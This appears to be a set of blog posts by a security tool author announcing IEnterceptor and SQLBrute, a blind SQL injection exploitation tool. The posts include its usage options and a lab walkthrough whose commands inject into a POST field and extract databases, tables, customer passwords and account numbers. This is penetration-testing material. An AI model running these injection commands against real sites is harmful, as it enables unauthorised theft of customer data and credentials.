justinclarke.com

• Fixed some of the situations where the tool would throw an exception. These wouldn't stop it from working, but it now handles most of these;
• Fixed the output of "?" for the enhanced WebSmack 2b and later versions. Now if a POST is output, there will be 2 question marks in the file (like there should be).

For those of you not familiar with IEnterceptor, it is a tool for capturing events from Internet Explorer on Windows. It requires Python for Windows, as well as the win32all extensions (all included with ActiveState Python).

If you start IEnterceptor on the command line, it will start an instance of IE. Any navigation events generated by the IE window will be output on the command shell, together with the parameters passed to the site. The format of the output (to stdout) is for a non-public tool known as WebSmack (written by Brian Holyfield), however it is still useful for capturing events even if you are not using this tool. IEnterceptor is designed for situations where you can't capture events using a local proxy or similar tool. The main drawbacks are that it will only capture events on the one window (none on popups), and that not all events may be captured. For example, events generated through Javascript may or may not be captured (depends on how it is done).

Drop me a line if there are any other issues with the tool. I haven't tested it rigourously in a while... Here is a screenshot of it in action

Update - An update to SQLBrute (version 1.0) has been released (including a Windows binary version). This is probably going to be the final version in Python - I've started rewriting the tool as a Windows GUI application in .NET, so look forward to a point-and-brute-force version soon.

• Get an identifiable difference between adding the exploit strings AND 1=1 and AND 1=2 to your SQL injection point (usually works if the query is normally valid)
• Get an identifiable difference between adding the exploit strings OR 1=1 and OR 1=2 to your SQL injection point (usually works if the query is normally invalid)

 ___  _____  __    ____  ____  __  __  ____  ____
/ __)(  _  )(  )  (  _ \(  _ \(  )(  )(_  _)( ___)
\__ \ )(_)(  )(__  ) _ < )   / )(__)(   )(   )__)
(___/(___/\\(____)(____/(_)\_)(______) (__) (____)

    Usage: ./sqlbrute.py options url
            [--help|-h]                        
            [--verbose|-v]                    
            [--server|-d oracle|sqlserver]     
            [--error|-e regex]                 
            [--threads|-s number]             
            [--cookie|-k string]              
            [--time|-n]                       
            [--data|-p string]                
            [--database|-f database]          
            [--table|-t table]                 
            [--column|-c column]               
            [--where|-w column=data]           
            [--header|-x header::val]          

• --data allows you to specify POST data for a form post. Takes a string containing all the data as an argument
• --cookie allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument
• --header allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar). The header name and value need to be supplied as a single argument of the form header::value

• --server forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool defaults to SQL Server, and won't intelligently detect that Oracle is in use
• --threads specifies how many worker threads the tool will use to send requests. This defaults to 5, however this should be reduced if you are getting unreliable results (especially when doing time based testing). Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing
• --time forces the tool to use time based testing instead of error based testing
• --verbose turns on verbose output. By default the tool doesn't output anything until it has completely enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose once will output preliminary results - allowing you to see that its working. Using verbose twice will output requests and responses to allow debug issues with the tool
• --output allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout

• --error specifies a regular expression to look for that appears in one of the AND or OR cases noted above. Usually this will be something identifiable such as an error message, or a message noting that no results were found
• --database (SQL Server only) specifies what database to use for enumerating data
• --table specifies what table to use for enumerating data
• --column specifies what column to use for enumerating data
• --where allows us to filter what data to brute force out by specifying a WHERE clause when enumerating a column. The where data must be in the form column_name=data (i.e. WHERE foo=bar)

• Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for SQL Server, and the list of user tables for Oracle
• Running the tool with the name of a database (SQL Server only) will enumerate the list of tables
• Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table
• Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data in that column of that parameter. You can then find matching values in other columns of the table through using a --where command line option

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last 
response comes in.
Found: msdb
Found: pubs
Found: model
Found: tempdb
Found: master
Found: webapp      

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp \
http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last 
response comes in.
Found: myview
Found: locator
Found: customer
Found: postings
Found: responses
Found: dtproperties
Found: fresh_postings
Found: fresh_responses

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last 
response comes in.
Found: city
Found: email
Found: lname
Found: fname
Found: mname
Found: phone
Found: endbal
Found: county
Found: begbal
Found: address
Found: custnum
Found: deposits
Found: password
Found: postcode
Found: withdrawals 

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column password http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last 
response comes in.
Found: dog
Found: test
Found: hawk
Found: loki
Found: fish
Found: buzz

<Control-C hit at this point>

./sqlbrute.py --data "searchtype=county&county=GM'" \
--error "NO RESULTS" --database webapp --table customer \
--column custnum --where password=dog \
http://192.168.182.128/locator.asp

This program will currently exit 60 seconds after the last 
response comes in.
Found: 1.036512520000000e+008  

If you code in Python and you've never come across psyco before I would highly recommend checking it out. I integrated basic psyco usage into my SQLBrute tool, and it seems from inital tests to give at least a 10% to 20% speed boost to even my inefficient code.

You don't get something for nothing though - it's a memory hog. Since I haven't tested it too much, and since SQLBrute is a network bound CPU hog at the best of times, I haven't turned it on by default - you can supply the --psyco option to try it out. Enjoy!

Security Hacks posted an article titled Top 15 free SQL Injection Scanners on Friday, with SQLBrute coming in at number four on the list. Which is interesting, since SQLBrute is not really a SQL Injection scanner, but is more of a exploitation tool. If you're looking for a SQL Injection scanner, have a look at SQLiX by Cedric Conchin.

For those of you using the tool, I am planning to do a rewrite in the not too distant future. Amongst other things planned, I'm probably going to move to .NET, include a GUI, and in general make the tool a lot easier to use. More news on this as I get some time to do some coding.

I've just uploaded the latest version of SQLBrute. This includes a lot of code cleanup, and a few bug fixes. I've also uploaded a Windows binary version of SQLBrute, made using py2exe, for those of you without Python, or who are having problems getting SQLBrute to work (which is usually due to an old version of Python). And, as always, you can find a walkthrough of how to use SQLBrute in my archived posts.

This is going to be the final version of SQLBrute to be released in Python. I've started redevelopment as a .NET Windows Forms application, and all new features, exploit techniques, and fun stuff will be rolled into that version (more detail to come as I approach something releasable).

A quick note - I am moving the downloads of SQLBrute (and in time, all of my tools) to the Gotham Digital Science tools page, so that we centralise downloads of all of our tools.

Although there isn't a lot there at the moment, we're going to be putting up a lot of tools we've been working on as time permits.